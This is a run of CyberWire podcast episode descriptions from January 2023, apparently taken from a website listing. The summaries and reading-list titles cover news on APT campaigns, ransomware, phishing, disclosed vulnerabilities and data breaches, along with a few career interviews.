How do the North Koreans get away with it? They do run their cyber ops like a creepy start-up business. A spoofing vulnerability is discovered in Windows CryptoAPI. Python-based malware is distributed via phishing. MacOS may have a reputation for threat-resistance, but users shouldn't get cocky. DevSecOps survey results show tension between innovation and security. Russian hacktivist auxiliaries hit German targets. Tim Starks from the Washington Post Cyber 202 shares insights from his interview with Senator Warner. Our guest is Keith McCammon of Red Canary to discuss cyber accessibility. And Private sector support for Ukraine's cyber defense.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/16

Selected reading.

TA444: The APT Startup Aimed at Acquisition (of Your Funds) (Proofpoint)

Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI (Akamai)

Securonix Security Advisory: Python-Based PY#RATION Attack Campaign Leverages Fernet Encryption and Websockets to Avoid Detection (Securonix)

BlackBerry's Inaugural Quarterly Threat Intelligence Report Reveals Threat Actors Launch One Malicious Threat Every Minute (BlackBerry)

Global CIO Report Reveals Growing Urgency for Observability and Security to Converge (Dynatrace)

Russian 'hacktivists' briefly knock German websites offline (Reuters)

How Microsoft is helping Ukraine’s cyberwar against Russia (Computerworld)

CISA Releases Two Industrial Control Systems Advisories (CISA)

Cyber Marketing Con 2022: From the horse’s mouth: CISO Q&A on solving the cyber marketer’s dilemma. [Special Editions] Jan 25, 2023

At the 2022 Cyber Marketing Con, the CyberWire presented a CISO Q&A panel session on how to help cyber marketers reach CISOs and other security executives in the industry. The panel included Rick Howard, CSO of N2K Networks, Jaclyn Miller, Head of InfoSec and IT at DispatchHealth, Ted Wagner, CISO of SAP NS2, and was moderated by board director & and operating partner, Michelle Perry.

Listen in as the panel discusses:

What works and doesn’t work in getting a security executive’s attention.
Message trust, message fatigue, and what you can do about it.
Trusted information sources and how security executives use them.
Positioning and messaging that is actually meaningful to decision makers.
The security executive’s purchasing behavior and why skepticism is the driving force.

Stay tuned until the end to hear us answer some additional bonus questions submitted by attendees.

Disentangling cybercrime from cyberespionage. A threat to the IoT supply chain. What do you do with the hacktivists when they stop being hacktivists? A retired FBI Special Agent is indicted. Jan 24, 2023

DragonSpark conducts "opportunistic" cyberattacks in East Asia. ProxyNotShell and OWASSRF exploit chains target Microsoft Exchange servers. The IoT supply chain is threatened by exploitation of Realtek Jungle SDK vulnerability. CISA adds an entry to its Known Exploited Vulnerabilities Catalog. A Cisco study finds organizations see positive returns from investment in privacy. What's the hacktivist's postwar future? Joe Carrigan tracks a romance scam targeting seniors. Our guest is Pete Lund of OPSWAT to discuss the security of removable media devices. And a retired G-Man is indicted on multiple charges.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/15

Selected reading.

DragonSpark | Attacks Evade Detection with SparkRAT and Golang Source Code Interpretation (SentinelOne)

Technical Advisory: Proxy*Hell Exploit Chains in the Wild (Bitdefender)

Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats (Unit 42)

CISA Adds One Known Exploited Vulnerability to Catalog (CISA)

2023 Data Privacy Benchmark Study (Cicso)

Hacktivism Is a Risky Career Path (WIRED)

Retired FBI Executive Charged With Concealing $225,000 In Cash Received From An Outside Source (Department of Justice, U.S. Attorney’s Office, District of Columbia)

Former Special Agent In Charge Of The New York FBI Counterintelligence Division Charged With Violating U.S. Sanctions On Russia (Department of Justice, U.S. Attorney’s Office, Southern District of New York)

Former Senior F.B.I. Official in New York Charged With Aiding Oligarch (New York Times)

Contractor error behind FAA outage. OneNote malspam. Vastflux ad campaign disrupted. Ukraine moves closer to CCDCOE membership. Alerts for gamblers and gamers. Jan 23, 2023

The FAA attributes its January NOTAM outage. Malicious OneNote attachments are appearing in phishing campaigns. The Vastflux ad campaign has been disrupted. Ukraine moves toward closer cybersecurity collaboration with NATO. Rick Howard considers the best of 2022. Deepen Desai from Zscaler looks at VPN Risk. And, finally, we’re betting you want alerts for sports book customers and online gamers.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/14

Selected reading.

FAA Says Contractor Unintentionally Caused Outage That Disrupted Flights (Wall Street Journal)

Not a cyberattack, but an IT failure: the FAA's NOTAM outage. (CyberWire)

Hackers now use Microsoft OneNote attachments to spread malware (BleepingComputer)

Traffic signals: The VASTFLUX Takedown (HUMAN Security)

Ukraine signs agreement to join NATO cyber defense center (The Record from Recorded Future News)

FanDuels warns of data breach after customer info stolen in vendor hack (BleepingComputer)

Industry looks at the MailChimp data incident. (CyberWire)

PSA: Don’t play GTA Online on PC right now (Video Games)

You might not want to play GTA Online right now due to security vulnerabilities (RockPaperShotgun)

Riot Games hacked, delays game patches after security breach (BleepingComputer)

Riot hit by ‘social engineering attack’ that will affect patch cadence for multiple titles (Dot Esports)

Miriam Wugmeister: Technology's not as complicated as you think. [Data Security] [Career Notes] Jan 22, 2023

Miriam Wugmeister, co-chair of Morrison & Foerster’s Privacy and Data Security practice, sits down to share her in-depth experience and understanding of privacy and data security laws, obligations, and practices across a wide range of industries. She talks about how she grew up not knowing exactly what she wanted to get into as a profession, starting off as a chemical engineering major in college before switching to philosophy. She then got asked to work on a project relating to a company’s privacy and fell in love with the subject matter, deciding then to pursue it as a career. Miriam mentions how technology is not as complicated as tech people might have you think. She hopes she can advertise a tech degree for young women and men looking to get into the field, as well as making sure she "encourages women and diverse lawyers to, uh, come into this area to thrive." We thank Miriam for sharing her story with us.

The power of web data in cybersecurity. [CyberWire-X] Jan 22, 2023

The public web data domain is a fancy way to say that there is a lot of information sitting on websites around the world that is freely available to anybody who has the initiative to collect it and use it for some purpose. When you do that collection, intelligence groups typically refer to it as open source intelligence, or OSINT. Intelligence groups have been conducting OSINT operations for over a century if you consider books and newspapers to be one source of this kind of information. In the modern day, hackers conduct OSINT operations in order to recon their potential victims by collecting email addresses, personal information, IP addresses, software versions, network configurations, and, if they are lucky, login credentials for websites and social media platforms. The question is, how can the good guys use these techniques to improve their security posture or maybe help the business in some kind of material way?

On this episode of CyberWire-X, the CyberWire’s Rick Howard and Dave Bittner discuss OSINT operations to improve your security posture with guests Steve Winterfeld, Hash Table member and Advisory CISO for Akamai, and Or Lenchner, CEO at our episode sponsor Bright Data.

Billbug infests government agencies. [Research Saturday] Jan 21, 2023

Brigid O. Gorman from Symantec's Threat Hunter Team joins Dave to discuss their report "Billbug - State-sponsored Actor Targets Cert Authority and Government Agencies in Multiple Asian Countries." The team has discovered that state-sponsored actors compromised a digital certificate authority in an Asian country during a campaign in which multiple government agencies were also targeted.

The research states they believe Billbug, which is a long-established advanced persistent threat (APT) group has been active since about 2009. They say "In activity documented by Symantec in 2019, we detailed how the group was using a backdoor known as Hannotog (Backdoor.Hannotog) and another backdoor known as Sagerunex (Backdoor.Sagerunex). Both these tools were also seen in this more recent activity."

The research can be found here:

Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries

Ransomware in Costa Rica. Cyberespionage against unpatched FortiOS instances. Credential stuffing PayPal, breaching T-Mobile. Utility business systems hit. Hackathons and phishing in Russia. Jan 20, 2023

Ransomware hits Costa Rican government systems, again. A Chinese threat actor deploys the BOLDMOVE backdoor against unpatched FortiOS. Credential stuffing afflicts PayPal users. T-Mobile discloses a data breach. A cyberattack hits a remote Canadian utility. The Wagner Group sponsors a hackathon. Malek Ben Salem from Accenture describes prompt injection for chatbots. Our guest is Paul Martini of iboss with insights on Zero Trust. And the FSB’s Gamaredon APT runs a hands-on Telegraph phishing campaign against Ukrainian targets.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/13

Selected reading.

Bolster Your Company Defenses With Zero Trust Edge (Forrester)

MICITT detecta incidente informático en el MOPT, el cual ya se encuentra contenido (MICITT)

MOPT mantiene habilitados todos los servicios de manera presencial (MICITT)

Costa Rica’s Ministry of Public Works and Transport crippled by ransomware attack (Record)

Suspected Chinese Threat Actors Exploiting FortiOS Vulnerability (CVE-2022-42475) (Mandiant)

Attackers Crafted Custom Malware for Fortinet Zero-Day (Dark Reading)

Chinese hackers used recently patched FortiOS SSL-VPN flaw as a zero-day in October (Security Affairs)

PayPal accounts breached in large-scale credential stuffing attack (BleepingComputer)

PayPal Confirms Over 34,000 Customer Accounts Were Breached (EcommerceBytes)

35,000 PayPal accounts hacked, and users could've prevented it (PCWorld)

Thousands Of PayPal Accounts Hacked—Is Yours One Of Them? (Forbes)

Nearly 35,000 PayPal users had SSNs, tax info leaked during December cyberattack (The Record from Recorded Future News)

T-Mobile Says Hacker Stole Data for 37 Million Customers (Bloomberg)

T-Mobile Says Hackers Stole Data on About 37 Million Customers (Wall Street Journal)

T-Mobile Says Hackers Used API to Steal Data on 37 Million Accounts (SecurityWeek)

Cyberattack hits Nunavut's Qulliq Energy Corp. (CBC News)

Nunavut power utility’s servers hit by cyber attack | IT World Canada News (IT World Canada)

Russian War Report: Russian hacker wanted by the FBI reportedly wins Wagner hackathon prize (Atlantic Council)

Gamaredon (Ab)uses Telegram to Target Ukrainian Organizations (Blackberry)

Gamaredon Group Launches Cyberattacks Against Ukraine Using Telegram (The Hacker News)

Hitachi Energy PCU400 (CISA)

Bolster Your Company Defenses With Zero Trust Edge (iBoss)

Criminal-on-criminal action in the dark web. The cyber phases of the hybrid war heat up. ICS vulnerabilities. Codespaces and malware servers. Blank-image attacks. Social engineering. Jan 19, 2023

A hostile takeover of the Solaris contraband market. Ukraine warns that Russian cyberattacks continue. An overview of 2H 2022 ICS vulnerabilities. Codespaces accounts can act as malware servers. Blank-image attacks. Campaigns leveraging HR policy themes. Dinah Davis from Arctic Wolf has tips for pros for security at home. Our guest is Gerry Gebel from Strata Identity describes a new open source standard that aims to unify cloud identity platforms. And travel-themed phishing increases.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/12

Selected reading.

Friday the 13th on the Dark Web: $150 Million Russian Drug Market Solaris Hacked by Rival Market Kraken (Elliptic Connect)

Russia-linked drug marketplace Solaris hacked by its rival (The Record from Recorded Future News)

Cyber-attacks have tripled in past year, says Ukraine’s cybersecurity agency (the Guardian)

Ukraine: Russians Aim to Destroy Information Infrastructure (Gov Info Security)

Ukraine says Russia is coordinating missile strikes, cyberattacks and information operations (The Record by Recorded Future)

ICS Vulnerabilities and CVEs: Second Half of 2022 (SynSaber)

Abusing a GitHub Codespaces Feature For Malware Delivery (Trend Micro)

The Blank Image Attack (Avanan)

Phishing Attacks Pose as Updated 2023 HR Policy Announcements (Abnormal Security)

Spammers phish eager vacationers with travel-themed lures, Bitdefender Antispam Lab warns (Bitdefender)

ICS security–vulnerabilities, mitigations, and threats. A Chinese APT prospects Iranian targets. The persistence of nuisance-level hacktivism. And war takes a toll on the criminal economy. Jan 18, 2023

CISA adds to its Known Exploited Vulnerability Catalog. Attacks against industrial systems. DNV is recovering from ransomware. Chinese cyberespionage is reported against Iran. The persistence of nuisance-level hacktivism. Robert M. Lee from Dragos outlines pipeline security. Our guest is Yasmin Abdi from Snap on bringing her team up to speed with zero trust. And a side-effect of Russia's war: a drop in paycard fraud.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/11

Selected reading.

Bolster Your Company Defenses With Zero Trust Edge (iBoss)

CISA Adds One Known Exploited Vulnerability to Catalog (CISA)

GE Digital Proficy Historian (CISA)

Mitsubishi Electric MELSEC iQ-F, iQ-R Series (CISA)

Siemens SINEC INS (CISA)

Contec CONPROSYS HMI System (CHS) Update A (CISA)

Nozomi Networks Researchers Take a Deep Look into the ICS Threat Landscape (Nozomi Networks)

A look at IoT/ICS threats. (CyberWire)

DNV's fleet management software recovering from ransomware attack. (CyberWire)

DNV says up to 1,000 ships affected by ransomware attack (Computing)

Ransomware attack on maritime software impacts 1,000 ships (The Record from Recorded Future News)

Chinese Playful Taurus Activity in Iran (Unit 42)

Playful Taurus: a Chinese APT active against Iran. (CyberWire)

Russian hackers allegedly tried to disrupt a Ukrainian press briefing about cyberattacks (Axios)

Russia's Ukraine War Drives 62% Slump in Stolen Cards (Infosecurity Magazine)

Annual Payment Fraud Intelligence Report: 2022 (Recorded Future)

Phishing campaigns (one uses mobilization as phishbait). Credential-stuffing attack affects Norton LifeLock users. Trends in security. Azure SSRF issues fixed. Calls for a “digital UN.” Jan 17, 2023

A Phishing campaign impersonates DHL. Conscription and mobilization provide criminals with phishbait for Russian victims. Norton LifeLock advises customers that their accounts may have been compromised. Trends in data protection. Veracode's report on the state of software application security. Ben Yelin looks at NSO group’s attempt at state sovereignty. Ann Johnson from Afternoon Cyber Tea speaks with Microsoft’s Chris Young about the importance of the security ecosystem. And Ukraine calls for a "digital United Nations."

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/10

Selected reading.

Cloud 9: Top Cloud Penetration Testing Tools (Bishop Fox)

Our Top Favorite Fuzzer crowdsourcing pen testing tools (Bishop Fox)

DHL Phishing Attack. Simply Delivered. (ArmorBlox)

Credential phishing campaign impersonates DHL. (CyberWire)

Phishing scam invites Russian Telegram users to check ‘conscription lists’ to see if they’ll be drafted in February (Meduza)

NortonLifeLock warns that hackers breached Password Manager accounts (BleepingComputer)

Norton LifeLock says thousands of customer accounts breached (TechCrunch).

NortonLifeLock notifies thousands of users about compromised Password Manager accounts (Computing)

Data Protection Trends Report 2023 (Veeam)

Trends in data protection. (CyberWire)

How Orca Found Server-Side Request Forgery (SSRF) Vulnerabilities in Four Different Azure Services (Orca Security)

Orca describes four Azure vulnerabilities. (CyberWire)

State Of Software Security (Veracode)

A look at the state of software security. (CyberWire)

Ukraine calls for ‘Cyber United Nations’ amid Russian attacks (POLITICO)

Andy Greenberg Interview: Tracers in the Dark. [CSO Perspectives] Jan 16, 2023

Rick Howard, N2K’s CSO and the CyberWire’s Chief Analyst, and Senior Fellow, interviews Andy Greenberg, Senior Writer at WIRED, regarding his new book, “Tracers in the Dark.”

Gene Fay: Lead from the front. [CEO] [Career Notes] Jan 15, 2023

Gene Fay, CEO of ThreatX sits down to share his experience rising through the ranks to get to where he is today. He shares how even at a young age he wanted to work in an office and become a businessman, though at the time he did not understand what that entailed. After college he acquired a job that was revolutionizing video editing for post-production studios as well as TV stations, where he started to really learn about technology. Gene talks about leading from the front and how a good leader will always do so, even if he has to lead from two different fronts. He said "it's kind of the two fronts, sometimes you've gotta put on the leadership face, and believe it, that, that you can get, and we can get through any situation, cuz sometimes you're, your gut feelings are, might be wrong and, or it's a moment in time and if you can help the team grind through that situation, it does get better." We thank Gene for sharing his story with us.

DUCKTAIL waddles back again. [Research Saturday] Jan 14, 2023

Mohammad Kazem Hassan Nejad from WithSecure joins Dave to discuss the team’s research, “DUCKTAIL returns - Underneath the ruffled feathers.” DUCKTAIL is a financially motivated malware operation that targets individuals and businesses operating on the Facebook Ads and Business platform.

The research states “The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account.” WithSecure has found that after a short hiatus, DUCKTAIL has returned with slight changes in their mode of operation.

The research can be found here:

DUCKTAIL returns: Underneath the ruffled feathers

Updates on the hybrid war, and on the incidents at the Royal Mail, the FAA, and the Guardian. Royal ransomware exploits Citrix vulnerability. CISA’s annual report is out. Jan 13, 2023

GitHub disables NoName accounts. Russia dismisses reports of cyberespionage attempts against US National Laboratories. The Royal Mail cyber incident is now identified as ransomware attack. An update on the NOTAM issues that interfered with civil aviation. A Citrix vulnerability is exploited by ransomware group. CISA publishes its annual report. Bryan Vorndran of the FBI Cyber Division calibrates expectations with regard to the IC3. Our guest is Kayne McGladrey with insights on 2023 from the IEEE. And Positive Hack Days and the growing isolation of Russia's cyber sector.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/9

Selected reading.

Impact of Technology in 2023 and Beyond (IEEE)

Ukraine at D+323: Fighting in Soledar, and industrial mobilization. (CyberWire)

GitHub disables pro-Russian hacktivist DDoS pages (CyberScoop)

Russia criticises Reuters story on Russian hackers targeting U.S. nuclear scientists (Reuters)

Royal Mail cyber incident now identified as ransomware attack. (CyberWire)

Not a cyberattack, but an IT failure. (CyberWire)

The Guardian breach and news media as targets. (CyberWire)

Citrix vulnerability exploited by ransomware group. (CyberWire)

2022 Year In Review (CISA)

Russia’s largest hacking conference reflects isolated cyber ecosystem (Brookings)

Trojanized VPN installers circulate in Iran. A trip down the static expressway. Hacktivism-for-profit. IT incidents disrupt NOTAMs and Royal Mail. HR phishbait. Jan 12, 2023

Iranian VPN users are afflicted by Trojanized installation apps. Phishing on the static expressway. NoName057(16) hacktivist auxiliaries target NATO. Yesterday’s flight outage appears not to have been caused by a cyberattack. Royal Mail is disrupted by a "cyber incident." Carole Theriault thinks Meta needs to step up their game when blocking financial scams. Our guest is Mark Sasson from Pinpoint Search Group to discuss why cybersecurity may no longer be a candidate-driven market. And HR phishbait dangles raises, and some employees bite.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/8

Selected reading.

EyeSpy - Iranian Spyware Delivered in VPN Installers (Bitdefender Labs)

Phishing on the Static Expressway. (CyberWire)

NoName057(16) - The Pro-Russian Hacktivist Group Targeting NATO (SentinelOne)

Not a cyberattack, but an IT failure. (CyberWire)

FAA NOTAM Statement (FAA)

Canadian Pilot-Alert System Reports Outage Hours After U.S. Grounding Order (Wall Street Journal)

US air travel resumes but thousands of flights delayed after planes grounded - live updates (The Telegraph)

US Flights Latest: Departures Resume After FAA Lifts Ground Stop (Bloomberg)

Royal Mail suffers ‘severe service disruption’ after cyber incident (Glasgow Times)

Royal Mail issues major disruption warning after 'cyber incident' (Computing)

Parcels and letters stuck in limbo as Royal Mail is hit by a suspected hack (The Telegraph)

Cyber Incident Hits UK Postal Service, Halts Overseas Mail (SecurityWeek)

Notes on patches. Dark Pink industrial cyberespionage campaign in Asia. Kinsing cryptojacking. Hacktivist DDoS against Iran. Healthcare cyber risk management. Pokémon NFTs. Jan 11, 2023

Patch Tuesday. CISA releases two ICS Advisories and makes some additions to its Known Exploited Vulnerabilities Catalog. Dark Pink APT is active against Asian targets. Kinsing cryptojacking targets Kubernetes instances. Ukrainian hacktivists conduct DDoS against Iranian sites. Risk exposure and a hospital's experience with ransomware. The Health3PT initiative seeks to manage 3rd-party risk. Tim Starks from the Washington Post’s Cyber 202 on cyber rising to the level of war crime. Our guest is Connie Stack, CEO of Next DLP, on the path to leadership within cyber for women. And phishing with Pokémon NFTs.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/7

Selected reading.

The Daily 202 (Latest Cybersecurity 202)

Microsoft Releases January 2023 Security Updates (CISA) >

Adobe Releases Security Updates for Multiple Products (CISA)

Black Box KVM (CISA)

Delta Electronics InfraSuite Device Master (CISA)

Known Exploited Vulnerabilities Catalog (CISA)

Dark Pink (Group-IB)

New Dark Pink APT group targets govt and military with custom malware (BleepingComputer)

Kinsing cryptojacking. (CyberWire)

Ukraine at D+321: "Difficult in places." (CyberWire)

Iranian websites impacted by pro-Ukraine DDoS attacks (SC Media)

Ransomware attack against SickKids said to be unusual. (CyberWire)

Health3PT seeks a uniform approach to healthcare supply chain issues. (CyberWire)

Breaking the glass ceiling: My journey to close the leadership gap. (CyberWire, Creating Connections)

Pokémon NFTs used as malware vectors. (CyberWire)

Some trends in threats and defense. The possibility of cyber war crimes. RSAC innovation showcases are open for application. And common KEVs in the financial sector. Jan 10, 2023

A look back at ransomware in 2022. Lessons from Russia's war: crooks, hacktivists, and auxiliaries. Cyberattacks as war crimes. The state of SSE adoption. RSA Conference 2023 opens applications for the Launch Pad and the Innovation Sandbox. Joe Carrigan looks at online scams targeting military members. Our guest is Richard Caralli from Axio on the State of Ransomware Preparedness. And the most common known exploited vulnerabilities affecting the financial sector.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/6

Selected reading.

Ransomware trends: 2022. (CyberWire)

State of Ransomware Preparedness Research Study: 2022 (Axio)

Kyiv argues Russian cyberattacks could be war crimes (POLITICO)

Ukraine official says Russian cyberattacks on its energy network could equate to war crimes (Yahoo)

Ukraine war and geopolitics fuelling cybersecurity attacks - EU agency (EU Reporter)

Industry-first research from Axis Security finds 65% percent of organizations plan to adopt a Security Service Edge platform within next two years (Axis Security)

RSAC Launch Pad is Back! (RSA Conference 2023)

The Best in Innovation Programs Starts Here (RSA Conference 2023)

Top KEVs in the U.S. Financial Services Sector (LookingGlass)

Social engineering shenanigans, by both crooks and spies. Suing social media over alleged mental health damages. And how to earn an “F.” Jan 09, 2023

Telegram impersonation affects a cryptocurrency firm. Phishing with Facebook termination notices. Russian phishing continues to target Moldova. The IEEE on the impact of technology in 2023. Glass ceilings in tech leadership. Seattle Schools sue social media platforms. Malek Ben Salem from Accenture explains coding models. Our guest is Julie Smith, identity security leader and executive director at IDSA, with insights on identity and security strategies. And dealing with the implications of ChatGPT.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/5

Selected reading.

Impact of Technology in 2023 and Beyond (IEEE)

Telegram insider server access offered to Dark Web customers (SafetyDetectives)

Moldovaʼs government hit by flood of phishing attacks (The Record from Recorded Future News)

OPWNAI : Cybercriminals Starting to Use ChatGPT (Check Point Research)

Hackers exploiting ChatGPT to write malicious codes to steal your data (Business Standard)

Armed With ChatGPT, Cybercriminals Build Malware And Plot Fake Girl Bots (Forbes)

Hackers Exploiting OpenAI’s ChatGPT to Deploy Malware (HackRead)

Cybercriminals are already using ChatGPT to own you (SC Media)

Threat Report: Impersonation Detected in Telegram Chats to Deliver Malware (Safeguard Cyber)

Seattle schools sue tech giants over social media harm (ABC News)

Seattle Public Schools sues TikTok, YouTube, Instagram and others, seeking compensation for youth mental health crisis (GeekWire)

Ghost Writer: Microsoft Looks to Add OpenAI’s Chatbot Technology to Word, Email (The Information)

Microsoft plans to use ChatGPT in Bing. Here's why it could be a threat to Google. (Freethink)

ChatGPT Hits Ethical Roadblock; Blocked (Analytics India Magazine)

A College Kid Built an App That Sniffs Out Text Penned by AI (The Daily Beast)

A Princeton student built an app which can detect if ChatGPT wrote an essay to combat AI-based plagiarism (Business Insider)

Teresa Rothaar: Outwork the competition. [Analyst] [Career Notes] Jan 08, 2023

Teresa Rothaar, a governance, risk, and compliance (GRC) analyst at Keeper Security sits down to share her story, from performer to cyber. She fell in love with writing as a young girl, she experimented with writing fanfiction which made her want to grow up to be in the arts. After attending college she found that she was good at math, lighting the way for her to start her cyber career. Teresa moved to being a writer at Keeper, finding she wanted to spread out and try more, so she ended up becoming an analyst while still doing writing on the side. She quotes David Duchovny in an interview once, explaining how sometimes you need to keep your head down and outwork others. Teresa said this resonated with her, saying, "that's how I went from a foreclosure box on the porch to where I am now. I have a good job and, and I have a career and I have a really good career and I absolutely love it." We thank Teresa for sharing her story.

Stealer malware from Russia. [Research Saturday] Jan 07, 2023

Marisa Atkinson, an analyst from Flashpoint, joins Dave to discuss a new blog post from Flashpoint’s research team about “RisePro” Stealer, malware from Russia, and Pay-Per-Install Malware “PrivateLoader.” “RisePro” is written in C++ and appears to possess similar functionality to the stealer malware “Vidar.” It's also a newly identified stealer, that began appearing as a stealer source for log credentials on the illicit log shop Russian Market on December 13, 2022.

The research states, "Samples that Flashpoint analysts identified indicate that RisePro may have been dropped or downloaded by the pay-per-install malware downloader service “PrivateLoader” in the past year." Analysts identified several sets of logs uploaded to the illicit underground Russian Market, which listed their source as “RisePro.”

The research can be found here:

“RisePro” Stealer and Pay-Per-Install Malware “PrivateLoader”

CISA releases three ICS Advisories. Squealing cars. Rotate your secrets. Russian cyberespionage updates. Jan 06, 2023

Security vulnerabilities in automobiles. CircleCI customers should "rotate their secrets." CISA Director Easterly notes Russian failures, but warns that shields should stay up. Attempted cyberespionage against US National Laboratories. Turla effectively recycles some commodity malware infrastructure. Robert M. Lee from Dragos shares his outlook on ICS for the new year. Our CyberWire Space correspondent Maria Varmazis interviews Diane Janosek from NSA about her research on space-cyber. And the Guardian continues to recover from last month's ransomware attack.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/4

Selected reading.

Hitachi Energy UNEM (CISA)

Hitachi Energy FOXMAN-UN (CISA)

Hitachi Energy Lumada Asset Performance Management (CISA)

Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More (Sam Curry)

Toyota, Mercedes, BMW API flaws exposed owners’ personal info (BleepingComputer)

16 Car Makers and Their Vehicles Hacked via Telematics, APIs, Infrastructure (SecurityWeek)

Ferrari, BMW, Rolls Royce, Porsche and more fix vulnerabilities giving car takeover capabilities (The Record by Recorded Future)

CircleCI security alert: Rotate any secrets stored in CircleCI (CircleCI).

CircleCI warns of security breach — rotate your secrets! (BleepingComputer)

CircleCI Urges Customers to Rotate Secrets Following Security Incident (The Hacker News)

CISA director: US needs to be vigilant, ‘keep our shields up’ against Russia (The Hill)

Exclusive-Russian Hackers Targeted U.S. Nuclear Scientists (Reuters via US News)

Notorious Russian Spies Piggybacked on Other Hackers' USB Infections (WIRED)

Turla: A Galaxy of Opportunity | Mandiant (Mandiant)

Fallout from Guardian cyber attack to last at least a month (ComputerWeekly)

State of Ransomware Preparedness (Axio)

PurpleUrchin’s freejacking. Bluebottle versus the banks. A supply-chain attack on a machine-learning framework. The ransomware leaderboard. And cyber ops in a hybrid war. Jan 05, 2023

The PurpleUrchin freejacking campaign. Bluebottle activity against banks in Francophone Africa. The PyTorch framework sustains a supply-chain attack. 2022's ransomware leaderboard. Cellphone traffic as a source of combat information. FBI Cyber Division AD Bryan Vorndran on the interaction and collaboration of federal agencies in the cyber realm. Our guest Jerry Caponera from ThreatConnect wonders if we need more "Carrots" Than "Sticks" In Cybersecurity Regulation. And two incommensurable views of information security.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/3

Selected reading.

An analysis of the PurpleUrchin campaign. (CyberWire)

PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources (Unit 42)

Bluebottle observed in the wild. (CyberWire)

Bluebottle: Campaign Hits Banks in French-speaking Countries in Africa (Symantec)

PyTorch incident disclosed, assessed. (CyberWire)

PyTorch dependency poisoned with malicious code (Register)

Compromised PyTorch-nightly dependency chain between December 25th and December 30th, 2022. (PyTorch)

Most active, impactful ransomware groups of 2022. (CyberWire)

2022 Year in Review: Ransomware (Trustwave)

Russia says phone use allowed Ukraine to target its troops (AP NEWS)

For Russian Troops, Cellphone Use Is a Persistent, Lethal Danger (New York Times)

Kremlin blames own soldiers for Himars barracks strike as official death toll rises (The Telegraph)

No Water’s Edge: Russia’s Information War and Regime Security (Carnegie Endowment for International Peace)

Terms of service and GDPR. LastPass breach update. GhostWriter resurfaces in action against Poland and its neighbors. Cellphones, opsec, and rocket strikes. Jan 04, 2023

Ad practices draw a large EU fine (and may set precedents for online advertising). Updates on the LastPass breach, and on Russian cyber activity against Poland. Malek Ben Salem from Accenture explains smart deepfakes. Our guest is Leslie Wiggins, Program Director for Data Security at IBM Security on the role of the security specialist. And cellphones, opsec, and the Makiivka strike.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/2

Selected reading.

Meta’s Ad Practices Ruled Illegal Under E.U. Law (New York Times)

Meta Fined More Than $400 Million in EU for Serving Ads Based on Online Activity (Wall Street Journal)

Meta's New Year kicks off with $410M+ in fresh EU privacy fines (TechCrunch)

LastPass data breach: notes and actions to take. (CyberWire)

Poland warns of attacks by Russia-linked Ghostwriter hacking group (BleepingComputer)

Russia says phone use allowed Ukraine to target its troops (AP NEWS)

Russian soldier gave away his position with geotagged social media posts (Task & Purpose)

Russian commanders blamed for heavy losses in New Year’s Day strike (Washington Post)

DPRK cyber ops. Poland warns of Russian cyber activity. Twitter’s data incident. A crypto trading exchange is rifled. Ransomware shuts down the Port of Lisbon. Small business opportunities. Jan 03, 2023

Recent DPRK cyber operations: spying and theft. Twitter’s data incident. 3Commas breached. Poland warns of increased Russian offensive cyber activity. Port of Lisbon hit by ransomware. DHS announces SBIR topics. New additions to the Known Exploited Vulnerabilities Catalog. Ben Yelin on the legal conundrum of AI generated code. Our guest is Tanya Janca from She Hacks Purple with insights on API security. And, news flash! LockBit says they have a conscience. (Yeah, right.)

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/1

Selected reading.

Recent DPRK cyber operations: spying and theft. (CyberWire)

Twitter targeted in extortion hack. (CyberWire)

3Commas' API compromised. (CyberWire)

Russian cyberattacks (Special Services)

LockBit activity over the holidays. (CyberWire)

CISA Adds Two Known Exploited Vulnerabilities to Catalog (CISA)

DHS Small Business Innovation Research (SBIR) Program FY23 Solicitation (SAM.gov)

The SBIR and STTR Programs. (SBIR/STTR)

Software supply chain management: Lessons learned from SolarWinds. [CyberWire-X] Jan 03, 2023

Between the emergence of sophisticated nation-state actors, the rise of ransomware-as-a-service, the increasing attack surface remote work presents, and much more, organizations today contend with more complex risk than ever. A “Secure-by-Design” approach can secure software environments, development processes and products. That approach includes increasing training for employees, adopting zero trust, leveraging Red Teams, and creating a unique triple-build software development process. SolarWinds calls its version of this process the "Next-Generation Build System," and offers it as a model for secure software development that will make supply chain attacks more difficult.

